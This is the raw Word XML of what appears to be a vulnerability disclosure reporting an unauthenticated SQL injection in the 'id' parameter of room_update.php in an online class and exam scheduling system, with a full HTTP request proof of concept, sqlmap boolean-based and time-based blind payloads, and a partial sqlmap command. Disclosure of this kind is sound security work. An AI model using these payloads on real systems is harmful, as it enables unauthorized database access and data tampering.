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9542E">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="cente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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>oom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>_update.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A59E571">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>NAME OF AFFECTED PRODUCT(S)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2110FF46">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6D6E4535">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Vendor Homepage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D04C63">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3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>AFFECTED AND/OR FIXED VERSION(S)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFE8D5A">
      <w:pPr>
        <w:pStyle w:val="4"/>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67571C18">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Vulnerable File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19121864">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/pages/r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>oom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>_update.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553D8D4C">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>VERSION(S)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F1EC94">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>V1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054E09EA">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Software Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1589D1">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3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>PROBLEM TYPE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B99C824">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Vulnerability Type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F91637F">
      <w:r>
        <w:t>SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192A905B">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Root Cause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3EB02F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>A SQL injection vulnerability was found in the '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>oom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>_update.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>' file of the '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pages</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>' project. This issue occurs because an attacker injects malicious code from the parameter "id"and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71770" cy="2062480"/>
            <wp:effectExtent l="0" t="0" r="1270"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71770" cy="2062480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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5D8D7D68">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>DESCRIPTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055BAA40">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A critical SQL injection vulnerability was found in the Online Class and Exam Scheduling System due to insufficient user input validation of the "id" parameter, allowing an attacker to inject malicious SQL queries. As a result, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information without logging in. Immediate remedial action is required to secure the system and protect data integrity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6652DE07">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>No login verification required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349D90A9">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Vulnerability details and POC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2495A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POST /scheduling/pages/room_update.php HTTP/</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  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E34CBF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Host: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>172.20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10.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C62C90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Content-Length: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCA277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Cache-Control: max-age=</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066CE91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Accept-Language: zh-CN  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D2D4D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Upgrade-Insecure-Requests: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5AC193D4">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Origin: http:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="3F7F5F"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>//172.20.10.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738FFCDC">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Content-Type: application/x-www-form-urlencoded  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E372BF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User-Agent: Mozilla/</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 (Windows NT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>10.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>; Win64; x64) AppleWebKit/</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(KHTML, like Gecko) Chrome/</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6533.100</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t> Safari/</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BEDD2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 text/html,application/xhtml+xml,application/xml;q=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>0.9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>,image/avif,image/webp,image/apng,*/*;q=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>0.8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>,application/signed-exchange;v=b3;q=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>0.7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C953B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Referer: http:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="3F7F5F"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>//172.20.10.3/scheduling/pages/room.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB5E00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Accept-Encoding: gzip, deflate, br  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4B058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Cookie: PHPSESSID=cqap7l86hda34ue59p29aav091  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2CEB2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Connection: keep-alive  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4633EA0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402E3F4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id=&amp;room=</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318E94CD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="1985010"/>
            <wp:effectExtent l="0" t="0" r="635"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72405" cy="1985010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E0E88C">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Vulnerability type:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1760730E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>time-based blind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B85B1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>boolean-based blind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FAEB7A">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Vulnerability location:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D688EC2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>'id' parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCCDE11">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C877772">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id (POST)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C3F7C6">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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F696086">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AND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 WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019CB25C">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AND EXTRACTVALUE(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>2018</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>,CASE WHEN (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>2018</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2018</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>) THEN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>2018</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t> ELSE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>0x3A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t> END)-- rJSi&amp;room=</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36E61646">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1328817A">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time-based blind  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01569CAE">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&gt;= </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12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t> OR time-based blind (query SLEEP)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CF0902">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OR (SELECT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>6454</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t> FROM (SELECT(SLEEP(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>)))mccW)-- LJUX&amp;room=</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25F5ACEB">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="1587500"/>
            <wp:effectExtent l="0" t="0" r="3175" b="1270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5269865" cy="1587500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5919CE86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D8FF628">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096736F6">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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rPr>
        <w:t>sqlmap -r </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>123</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
